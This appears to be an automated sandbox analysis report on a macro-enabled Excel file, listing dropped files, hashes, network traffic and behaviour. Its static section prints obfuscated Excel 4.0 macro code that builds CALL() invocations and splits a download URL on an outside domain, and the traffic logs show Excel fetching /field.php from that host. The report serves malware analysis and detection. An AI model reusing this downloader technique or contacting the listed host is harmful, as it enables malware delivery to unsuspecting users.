                                                                                                                                                  Preview: L..................F.... ....B`.8.....3D'+..mh1D'+..|9...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S.......................a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.t:...R.. .DOCUME~1.XLS..x......>Q.u.R......f......................z.D.o.c.u.m.e.n.t.s._.1.6.0.5.9.6.2.0.8.3._.8.9.5.7.3.9.1.4.9...x.l.s.m.......j...............-.......i...........>.S......C:\Users\user\Desktop\Documents_1605962083_895739149.xlsm..:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.s._.1.6.0.5.9.6.2.0.8.3._.8.9.5.7.3.9.1.4.9...x.l.s.m.........:..,.LB.)...Aw...`.......X.......123716...........!a..%.H.VZAj....Yt.+........W...!a..%.H.VZAj....Yt.+........W..............1SPS.XF.L8C....&.m.q............/...
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):145
                                                                                                                                                  Entropy (8bit):4.8294227144552035
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:oyBVomxWqds9UfUQD14o5S/9UfUQD14omxWqds9UfUQD14ov:dj/KUhh4ySlUhh4/KUhh4y
                                                                                                                                                  MD5:C2C383724036C4A4C7928281EA1739D6
                                                                                                                                                  SHA1:65BE5AD41863C36977E4038CC88852B6537421AD
                                                                                                                                                  SHA-256:1CC389A2A63C14B73001DC431D2E4E196E1CFBD3ACC685915EAC9B92D74A3684
                                                                                                                                                  SHA-512:3D714C83283E442D05B61CF8CFDB6B01372181B75A43471281C4C5557B7845DFE6692B8991CE0C103169796C9F03F2087CFBBBD6ACF8E02E1559836FDF7D10A6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: Desktop.LNK=0..[misc]..Documents_1605962083_895739149.LNK=0..Documents_1605962083_895739149.LNK=0..[misc]..Documents_1605962083_895739149.LNK=0..
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):22
                                                                                                                                                  Entropy (8bit):2.9808259362290785
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                  C:\Users\user\Desktop\AFB10000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):80252
                                                                                                                                                  Entropy (8bit):7.886639121919228
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:JSg+a2ch8yqAeWviEjrWGHL2trlMVGoIahaDHTU6hryF70zz:Ig+7cajAigW2Lwr2sTU2yF70H
                                                                                                                                                  MD5:98B5D0F8DBAFA4B5E2440F97C5929599
                                                                                                                                                  SHA1:6B137D50DC713EAE6483A8C5C513575FA8013FAE
                                                                                                                                                  SHA-256:E7C086EB84AC9F0637B120B661E2B40142ACFF5034FAF25AFB3E854E48A388F2
                                                                                                                                                  SHA-512:AE2BD3B6D96B6E87C7BC28080C714353F74FEE251D0CC4CFD341DBED0BAEB60187AF569769567AC8CB7CB31798A5A4F1F45E9C40007245CA8A6F889B3C9435A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .U.n.0....?......(..r.mrl.4...9..s..I./I;n...l .-$.{.f...r0.z.@...7.V..N*;o.......(.....-........#U.m.e}..;.$z4@..h.L..~.{...#..L.r.lD..9.l..;......*.o...Z..Z.L..q>.@.".:.c.jz.....S>......k.MB.5.+Og..;.y...k..T..$V7../0.-.4.taq...N..4T. P7.#.......4..>E.E. ....../.\..S....&..!..d!3..N...q\|P.%..&dS....v......2_..Q{....#/...O..>.K.t.-."..C@.'..&O..s..q...9...8>.k.m.....)..g...ft.....p.C.:.F1......(G.y..f........PK..........!.9...............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\Desktop\~$Documents_1605962083_895739149.xlsm
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                  MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                  SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                  SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                  SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                                                  Entropy (8bit):7.88644231921371
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                  • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                  File name:Documents_1605962083_895739149.xlsm
                                                                                                                                                  File size:80500
                                                                                                                                                  MD5:77941203a3ef209ec6b53d47f0b6d5c0
                                                                                                                                                  SHA1:a2c4f211a8007a6c1def18ab10722edd235a5a70
                                                                                                                                                  SHA256:05ec137601fe0cb3bb5605a55df59e9e03cff966b43e545910cd12030bfca456
                                                                                                                                                  SHA512:21ab17439a8ccd89134e6beb9640c209d03643f1ae572a2807851ce48f0f5eea4c442f6e554850703d9817be22a998040ce52ff7de375bbd823b0d255a0d80ca
                                                                                                                                                  SSDEEP:1536:EYwxIP2YdDB3AeWOiX0mT/WGH+lMVGoIahaDHTU6hryF70w:EYwxIP2YRB3Ri1/W2+2sTU2yF70w
                                                                                                                                                  File Content Preview:PK..........!.9...............[Content_Types].xml ...(.........................................................................................................................................................................!!..............................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74ecd0e2f696908c

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "Documents_1605962083_895739149.xlsm"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:

                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                  =HALT()
                                                                                                                                                  "=""""&""""&""""&""""&""""&CALL(Docs1!BM23&Docs1!BM24&Docs1!BM25,Docs1!BO23&Docs1!BO24&Docs1!BO25,Docs1!BQ23&Docs1!BQ24,0,Docs1!BR23&Docs1!BR24,Docs1!BP9,0,0)=Docs4!AR8()"
                                                                                                                                                  ,,ht,,tp://,,sankhyasol.com/field.,,php,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&CALL(Docs1!BN13&Docs1!BN14,Docs1!BP13&Docs1!BP14&Docs1!BP15&Docs1!BP16&Docs1!BP17,Docs1!BR13&Docs1!BR14&Docs1!BR15,0,BC6&BC7&BC8&BC9,Docs1!BP9,0,0)=ACOS(45415151)=ATAN2(485,45151)=""""&""""&""""&""""&""""&""""&""""&Docs3!AN14()",,

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  04/06/21-13:50:47.395799TCP1201ATTACK-RESPONSES 403 Forbidden8049165148.66.138.148192.168.2.22

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 6, 2021 13:56:07.922605991 CEST4970380192.168.2.5148.66.138.148
                                                                                                                                                  Apr 6, 2021 13:56:08.194341898 CEST8049703148.66.138.148192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:08.194458008 CEST4970380192.168.2.5148.66.138.148
                                                                                                                                                  Apr 6, 2021 13:56:08.194941044 CEST4970380192.168.2.5148.66.138.148
                                                                                                                                                  Apr 6, 2021 13:56:08.466222048 CEST8049703148.66.138.148192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:08.933491945 CEST8049703148.66.138.148192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:08.933569908 CEST4970380192.168.2.5148.66.138.148
                                                                                                                                                  Apr 6, 2021 13:56:13.938246965 CEST8049703148.66.138.148192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:13.938348055 CEST4970380192.168.2.5148.66.138.148
                                                                                                                                                  Apr 6, 2021 13:57:53.521610022 CEST4970380192.168.2.5148.66.138.148
                                                                                                                                                  Apr 6, 2021 13:57:54.241107941 CEST4970380192.168.2.5148.66.138.148
                                                                                                                                                  Apr 6, 2021 13:57:55.598587990 CEST4970380192.168.2.5148.66.138.148
                                                                                                                                                  Apr 6, 2021 13:57:58.301992893 CEST4970380192.168.2.5148.66.138.148
                                                                                                                                                  Apr 6, 2021 13:58:03.708811045 CEST4970380192.168.2.5148.66.138.148
                                                                                                                                                  Apr 6, 2021 13:58:14.506467104 CEST4970380192.168.2.5148.66.138.148
                                                                                                                                                  Apr 6, 2021 13:58:36.090332985 CEST4970380192.168.2.5148.66.138.148

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 6, 2021 13:55:50.623544931 CEST5378453192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:55:50.669401884 CEST53537848.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:55:50.895243883 CEST6530753192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:55:50.959316015 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:55:51.709620953 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:55:51.755599022 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:55:53.053817987 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:55:53.113601923 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:55:55.499326944 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:55:55.555495024 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:02.512104034 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:02.561059952 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:03.544033051 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:03.610192060 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:04.071213007 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:04.140878916 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:05.079694033 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:05.174031973 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:06.095392942 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:06.141365051 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:07.723135948 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:07.769088030 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:07.862979889 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:07.920154095 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:08.107491970 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:08.162131071 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:09.731199026 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:09.778044939 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:11.239132881 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:11.287899971 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:12.123868942 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:12.196696997 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:12.379369974 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:12.425323009 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:14.734051943 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:14.780184984 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:16.111826897 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:16.158400059 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:16.759892941 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:16.816555977 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:25.752408028 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:25.802012920 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:27.388684988 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:27.444027901 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:56:46.099533081 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:56:46.161555052 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:09.703402042 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:09.762736082 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:18.400568962 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:18.456674099 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:41.206809044 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:41.273030043 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:42.318372011 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:42.401639938 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:42.839248896 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:43.003995895 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:43.476929903 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:43.531532049 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:43.602912903 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:43.677532911 CEST53503948.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:44.045284033 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:44.100203037 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:44.602660894 CEST5381353192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:44.662204981 CEST53538138.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:45.138283014 CEST6373253192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:45.192909002 CEST53637328.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:45.912902117 CEST5734453192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:45.970175982 CEST53573448.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:46.840500116 CEST5445053192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:46.897974014 CEST53544508.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:47.359935045 CEST5926153192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:47.489000082 CEST53592618.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:56.988771915 CEST5715153192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:57.044951916 CEST53571518.8.8.8192.168.2.5
                                                                                                                                                  Apr 6, 2021 13:57:58.144226074 CEST5941353192.168.2.58.8.8.8
                                                                                                                                                  Apr 6, 2021 13:57:58.215429068 CEST53594138.8.8.8192.168.2.5

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Apr 6, 2021 13:56:07.862979889 CEST192.168.2.58.8.8.80x8fa0Standard query (0)sankhyasol.comA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Apr 6, 2021 13:56:07.920154095 CEST8.8.8.8192.168.2.50x8fa0No error (0)sankhyasol.com148.66.138.148A (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • sankhyasol.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.549703148.66.138.14880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Apr 6, 2021 13:56:08.194941044 CEST505OUTGET /field.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: sankhyasol.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Apr 6, 2021 13:56:08.933491945 CEST719INHTTP/1.1 403 Forbidden
                                                                                                                                                  Date: Tue, 06 Apr 2021 11:56:08 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                  Connection: Upgrade, Keep-Alive
                                                                                                                                                  Vary: User-Agent
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Keep-Alive: timeout=5
                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:13:56:02
                                                                                                                                                  Start date:06/04/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x1180000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >